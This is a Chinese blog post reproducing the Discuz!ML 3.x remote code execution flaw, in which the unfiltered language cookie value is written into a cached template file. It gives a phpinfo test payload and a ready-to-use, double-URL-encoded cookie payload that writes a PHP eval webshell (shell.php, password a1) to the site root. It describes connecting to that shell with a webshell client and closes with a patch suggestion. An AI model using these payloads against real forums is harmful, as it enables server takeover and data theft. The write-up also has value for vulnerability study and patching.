Discuz !ML V3.X漏洞复现

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 漏洞复现 Discuz !MX
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Seizerz/article/details/96447622
版权

前言:前些天一直在学习新知识,今天抽空做个文档整理,记录下学习情况。

废话不多说,正文开始。

0X01 漏洞介绍

2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。

本次漏洞是由于Discuz! ML对于cookie字段的不恰当处理造成的:cookie字段中的language参数未经过滤,直接被拼接写入缓存文件之中,而缓存文件随后又被加载,从而造成代码执行。

Ps:Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区.该引擎基于Comsenz Inc.创建的着名的Discuz!X引擎开发。

Discuz! ML 下载地址:https://discuz.ml/download

 

0X02 影响版本

Discuz! ML v.3.4

Discuz! ML v.3.3

Discuz! ML v.3.2

 

0X03 漏洞复现

1、phpinfo验证

访问主页,burp抓包后,修改cookie值中的language参数

Ov1T_2132_language='.phpinfo().';

2、getshell

将cookie中的language字段值修改为以下内容

原语句:<?php  eval($_POST["a1"]);?>

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2550%254f%2553%2554%255b%2522a1%2522%255d%29%253b%253f%253e%27%29%29.%27

注意这里的url编码,因为使用了urldecode进行解码,而浏览器本身会对一些字符进行url编码,所以这里进行了二次编码进行poc的编写,若有理解不当的地方,还请指明。

访问网站首页会在根目录下生成木马文件:shell.php,密码为a1

使用蚁剑进行连接,成功。(一开始用的菜刀,咋都连不上,以为是自己的问题,后来发现是工具的问题,崩溃。。。。)

这里放一个另外个网址的图,自己搭的环境忘记截图了(懒得截了,手动滑稽)

0X04 修复建议

建议修改source/function/function_core.php 644行为:

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

删除可控变量。

 

参考文章:

https://mp.weixin.qq.com/s/DELNgYJtYVgGURM3RX5gnA

https://mp.weixin.qq.com/s/fTk9BC8OEZY91_pCZcEzGQ

https://mp.weixin.qq.com/s/5Zl3Jve4eblNIXh30t469w

 

Seizerz
关注
专栏目录
DiscuzML远程代码执行(CVE-2019-13956)
jklbnm12的博客
03-08 881
一、漏洞描述 该漏洞存在discuz ml(多国语言版)中,cookie中的language可控并且没有严格过滤,导致可以远程代码执行。 二、漏洞影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 三、漏洞环境搭建 官网下载Discuz! ML V3.4,下载地址: http://discuz.ml/download 将压缩包解压到phpstudy网站根目录,浏览器访问upload目录开始安装 然后就是一直点击下一步就可以了,直到完成安装 四
Discuz!ML 3.x任意代码执行漏洞
logan_logan的博客
07-29 1700
1.简介 影响系统及版本:Discuz!ML V3.2-3.4 漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 2.环境搭建 网站环境:phpstudy_pro DisCuz版本:3.4 PHP版本:php5.4.45nts Apache版本:2.4.39 Mysql版本:5.7.26 3.Discuz安装 将源码复制到网站根目录下; 在网页输入地址打开安装界面,然后一直下一步就ok了; 4.漏洞复现 用火狐浏览器打开,
php漏洞站点复现,Discuz!ML 3.x任意代码执行漏洞之大佬分析之后我分析
weixin_33730916的博客
03-20 379
原标题:Discuz!ML 3.x任意代码执行漏洞之大佬分析之后我分析首先附上米斯特安全大佬们文章的链接,刚开始有些东西我没看的太懂,于是我就再添了点东西,希望像我一样的小白也能看懂。一、漏洞综述漏洞类型:代码执行漏洞影响系统及版本:Discuz!ML V3.2-3.4漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。二...
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1324
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
discuz安装_Discuz! ML RCE漏洞 getshell 复现
weixin_39808803的博客
12-21 146
0x00 影响版本Discuz!ML是一个由http://CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区,漏洞版本如下:Discuz! ML V3.2Discuz! ML V3.3Discuz! ML V3.40x01 环境搭建使用phpstudy搭建:直接官网下载即可http://discuz.ml/download,将压缩包...
1419.ml forum.php,discuz ml RCE漏洞重现及分析
weixin_35976717的博客
03-18 510
0x00 概述7月11日,在网上发现discuz ml(多国语言版)出现RCE漏洞的消息,漏洞在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。0x01 影响范围Discuz!ML v.3.4 ,Discuz!ML v.3.2 ,Discuz!ML v.3.3 product ofcodersclub.org0x02 漏洞重现让请求cookie含有xxxx_xxxx_...
Discuz! ML RCE漏洞 getshell 复现
weixin_30425949的博客
07-15 545
0x01 影响版本 Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 0x02 环境搭建 直接官网下载即可http://discuz.ml/download 将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装 之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装 0x03 漏洞Poc ...
discuzML 3.x代码执行漏洞的利用 笔记
边城浪子的博客
09-18 1372
服务器:windows 2003 攻击机:windows 10 搭建过程:下载discuzML 3.x源码 链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码:5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...
Discuz!NT 3.6.711 安装包
05-01
Discuz!NT 是康盛公司(Comsenz)旗下一款专业的论坛建站软件,专为Windows平台倾力打造,秉承开源,开放的原则,提供开放的API接口,方便站长无缝整合论坛资源,Discuz!NT希望能为Windows服务器下的站长提供更多,更...
论坛注册美化插件 for Discuz!X1.5.rar
07-14
X1.5.jpg" border="0" src="/uploads/allimg/101207/163320E44-0.jpg" width="319" onload="if(this.width>600)makesmallpic(this,600,1800);" height="398" alt="" /> 论坛注册美化插件for Discuz!X1.5.jpg" ...
Discuz! X 3.4 ML 任意代码执行漏洞复现
墙角睡大觉的专栏
07-13 3933
0X1 漏洞概述 2019年7月11日,网络上出现了一个DiscuzML远程代码执行漏洞的PoC,研究员验证分析发现,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。漏洞影响范围包括如下版本。 Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz...
discuz安装_Discuz! ml RCE漏洞复现(自写EXP分享)
weixin_39946300的博客
12-28 932
# 000 前言大家好我是PANDA墨森,昨天公众号粉丝涨了一大波,首先感谢一下圈子社区的大力分享,也祝愿圈子社区能越办越好!今天的文章还是老样子,漏洞复现+自写EXP分享,脚本有需要的后台留言,也可以自行更改,话不多说,往下看#001 Discuz!ml简介:Discuz!ml是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善...
Discuz 3.x 任意文件删除漏洞复现
qq_41048303的博客
12-06 2216
Discuz!X ≤3.4 任意文件删除漏洞 1.漏洞环境 执行docker-compose up -d 启动后,访问http://192.168.1.142/install来安装discuz 2.漏洞复现 访问http://192.168.1.142/robots.txt可见robots.txt是存在的 注册用户hahaha 在个人设置页面找到自己的formhash 带上自己的Cookie、formhash发送如下数据包 查看个人设置页面的出生地 构造upload.ht
Discuz漏洞
W_seventeen的博客
08-01 4925
1、漏洞描述 Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2、产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 3、影响版本: Discuz! ML V3.2 Discuz! ML V3.3 Discuz! ML V3.4 4、利用exp,进行上传一句话木马 1.cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
漏洞分析】Discuz X3.3补丁安全分析
vspiders的博客
08-26 2414
0x01 漏洞分析 漏洞发生在页面/upload/source/admincp/admincp_setting.php页面,看源码 $settingnew = $_GET['settingnew']; if($operation == 'credits') { $extcredits_exists = 0; foreach($settingnew['extcredits'] as
Discuz漏洞复现
小小猪的博客
11-30 5790
Discuz漏洞复现 漏洞描述: Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码,进一步可获取整个网站的服务器权限。 漏洞影响版本: Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org (注意:支持多语言切换可能会有这个漏洞!) 环境搭建: 这里用安鸾渗透测试实战平台环境 :地址 这里访问robots.txt,发现下面有很多路径,访问之
Discuz X 3.4 系列漏洞梳理
热门推荐
weixin_50464560的博客
04-05 2万+
分析了目前已经公开的Dz3.4系列漏洞,作为学习和记录。 Discuz!X ≤3.4 任意文件删除漏洞 1、简述 漏洞原因:之前存在的任意文件删除漏洞修复不完全导致可以绕过。 漏洞修复时间:2017年9月29日官方对gitee上的代码进行了修复 2、复现环境 因为官方提供的下载是最新的源码,漏洞修复时间是17年9月29日,通过git找一个修复前的版本签出就可。 git checkout 1a912ddb4a62364d1736fa4578b42ecc62c5d0be 通过安装向导安装完.
Discuz X 系列全版本 后台Sql注入漏洞
bulangman277的博客
12-28 3583
Discuz! X 系列全版本 后台Sql注入漏洞
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4552
Discuz v3.4系列 远程代码执行漏洞全流程详解
discuz3.4!ml.zip
04-28
ml.zip 是一个与论坛程序 Discuz! 相关的软件包,其中包含多语言支持的文件。Discuz! 是一个开源的 PHP 论坛程序,它允许网站管理员创建和管理论坛,让用户能够在线交流和讨论。该软件包使得 Discuz! 能够支持多种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值